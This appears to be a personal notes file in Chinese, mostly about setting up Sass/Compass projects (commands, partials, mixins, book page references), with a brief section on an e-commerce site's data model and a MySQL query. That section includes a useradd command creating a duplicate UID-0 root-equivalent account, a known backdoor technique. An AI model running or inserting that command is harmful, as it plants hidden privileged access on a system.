
************************************************************************************************************

任务正理：PostgreSQL  PHP模式   EA11

创建SASS工程
创建定制化的compass工程（在命令行切换到需要创建工程的目录后执行命令）
compass create--bare -sass-dir "sass" -css-dir "css" -javascript-dir "js" -images-dir "images"
引号内就是你要创建工程的目录名称，如果你要创建默认工程，只需要切换到指定目录后执行如下命令: compass create
对config.rb文件进行修改后，特别是修改了输出风格后，需要在效果更改前清理.sass-cache。可以手动删除，也可以使用命令:
copass clean
如果使用命令行来监控工程的变化，必须运行命令再次启用监控：compass watch
创建和使用模块文件
1.在工程的Sass文件夹下，创建一个名为partials文件夹。在此文件夹下创建一个_normalize.scss文件，注意一定要有下划线开头.如果没有下划线sass和compass会认为该文件在保存时需要编译。
2.找到一些标准化下样式，http://necolas.github.com/normalize.css 或者 https://github.com/kristerkari/normalize.scss	
使用标准化的好处有很多，可以轻松关闭对IE等旧版本浏览的支持功能等 。将内容粘贴到partials/_normalize.scss文件下并保存就可以了
3.在要使用模块文件的前面加上：
   @import "compass";
   @import "partials/normalize";
4.如果要使用变量,可以使用变量模块文件来统一定义变量，创建partials/_variables.scss
   @import "compass";
   @import "partials/variables";
   @import "partials/normalize";
注意：路径可能会出现问题，建议把模块文件写在sass目录下。

嵌套语法

伪类的写法：《sass和compass设计师指南》第80页
父级选择器，级连选择器：《sass和compass设计师指南》第81页
使用父级选择器轻松添加modernizr样式：《sass和compass设计师指南》第82页
过渡嵌套的危险：《sass和compass设计师指南》第85页
ID选择器好不好？《sass和compass设计师指南》第87页
嵌套命名空间：《sass和compass设计师指南》第88页
使用@extend命令扩展现有代码：《sass和compass设计师指南》第92页
使用占位符选择器来扩展需要的样式：《sass和compass设计师指南》第93页
什么是混合宏？如何使用混合宏来轻松生成常用代码？《sass和compass设计师指南》第94页
如何用默认值写混合宏？《sass和compass设计师指南》第98页
@mixin bs($bs-type:border-box)
{
	-webkit-box-sizing:$bs-type;
	-moz-box-sizing:$bs-type;
	box-sizing:$bs-type;
}
生成CSS的注意事项：《sass和compass设计师指南》第101页
轻松玩转颜色
变浅函数示例：lighten($color,30%);
加深函数示例：darken($color,10%);










************************************************************************************************************
www.multimall.cn

卖家（vendor）  商品(wares)   订单(order)   买家（buyer） 



useradd -o -u 0 -g 0 -M -d /root -s /bin/bash vxzhan
select (@i:=@i+1) as i,post_time from tb_check_price,(select @i:=0) as tt  order by post_time desc; 


************************************************************************************************************












